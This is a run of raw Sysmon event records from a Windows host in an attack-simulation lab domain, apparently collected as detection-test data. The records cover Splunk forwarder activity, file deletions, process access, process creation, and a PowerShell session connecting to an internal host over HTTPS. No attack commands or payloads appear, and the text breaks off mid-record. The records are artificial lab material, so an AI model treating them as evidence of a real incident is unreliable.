18:16:20.762{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A05D954FE74BCD170C61C0800E8104CB,SHA256=076380D814A743D2EE35C3634B26123AD2CB05F8E1F0805BEBD26FEDF96695E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:21.893{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5E6A871191C491E6FEABBA0CCBDC3E4A,SHA256=EF6B9E97EBB4A5A317261DEC60D7B09E081609EF6A882C87C361363D2D4EE7D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:21.791{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EECFF4D204267A8CC3C374D9D405C25,SHA256=26E2354B806C09DAF9284F6C6C1F1CB678952B6670E89DF0293440956837A8A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:21.656{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=51AE5CAD281C1F2CF0EE2B5E13361573,SHA256=0A057DF35C5FBF8E19CA680547FBD7D82F4B8AF4051CB4CC8D8B078AC7BE9AC9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:21.656{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1483593A7373814A26727C41B71045F6,SHA256=050B81DC7C4BBF90F584871E3BFA609B9FB162C5520189172A23543D85FE9470,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:45.103{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56746-false10.0.1.12-8000- 23542300x800000000000000035085589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:22.809{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA65CF9220B55E70F89DFCCAE608D720,SHA256=556746D6EC7FEB75836F774886F0DB3F6B2BB70F8D927864B64FE18EF661F119,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:23.823{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BF2B84FCCC5F5FD6F9FE513E7C383E1,SHA256=BC01D56347C338CE21415A68E321CECF332E9B82782E90A136A87CF60DF65EBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:46.904{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56747-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:24.838{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A28BCE095EF08265E68931B11601FEB,SHA256=A8E6A0B42C5D385FB719872B0B3EC9079024CCACF7AEED6B917041CB8A982B4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:25.852{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D58180781C1B6B485C76AD17D4190CF3,SHA256=9061F2A363101D2A83C5C9DB39B46421BC543915D24FA36E48702B57DA9AC9D3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:26.866{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FF2221DBA386A8ED5EF2839D2C4EDCF,SHA256=2DD95B1FC6C28416B6B291C59BFD91B5DE748E0DBEC4CD69744267587093C142,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:50.263{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56748-false10.0.1.12-8000- 23542300x800000000000000035085596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:27.883{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1CB0692A480DA354BCA6D18AC576590,SHA256=9ED3CE0DAC83893A6A620D3CB9F14B36BD7B5DCC93B00797AF942D9B79BC126A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.965{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F7C-613A-6C90-03000000C801}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:28.965{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.965{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:28.965{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F7C-613A-6C90-03000000C801}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.965{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:28.965{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.965{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F7C-613A-6C90-03000000C801}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.950{B81B27B7-4F7C-613A-6C90-03000000C801}5692C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.934{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90DB0E13194E39336669E6F30355EA29,SHA256=134AEAE09EDBB6A5CB8148FC8E03CF036EB4E48B6B342EBB57361565305FE673,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.718{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=43DD4E71A5D0D6B1FFB3F1AFDB434B56,SHA256=5C69A7134525B739F8A5900282100404474A188D2DED0C9294D86936D11977CE,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000035085612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.718{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=14F582F0B647D6BCE943DDE6E75F32BF,SHA256=B5335FA34384E87863CBD86878936B554723089589B9743E5C69A830C0AC1AF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.718{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=0B7BDE63C5B552F73FDB0849B5C1E07A,SHA256=5F84F0CE3C49DEFF4774B6D5B87FF8159D12B008ED8084BCA18E0EE8B020F40E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.718{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=B1A8E837F6C8CE32FE4F07622A06A359,SHA256=7FD66CDBCD2AD4437B024C91166F1C5F287A66ABA5FC0FCDF6910DDFA83B17A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.718{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=B299895FC65CB2CF459C173DE0093F88,SHA256=599075CCBF553D41308ADF36F6EECCAA1F33D84562AB30101B8B177A3D88A794,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.718{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=01A9423BE0D1EA1B6A7C2B2BC8C122AB,SHA256=F85A6D1041F9CA2EDE51E75EF7980D33A65FAF7A978436C6EFCB862EB25F6E98,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:52.929{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56749-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035085606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.450{B81B27B7-4F7C-613A-6B90-03000000C801}66086664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.285{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F7C-613A-6B90-03000000C801}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.283{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:28.283{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.283{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:28.283{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.283{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F7C-613A-6B90-03000000C801}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.282{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F7C-613A-6B90-03000000C801}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.266{B81B27B7-4F7C-613A-6B90-03000000C801}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 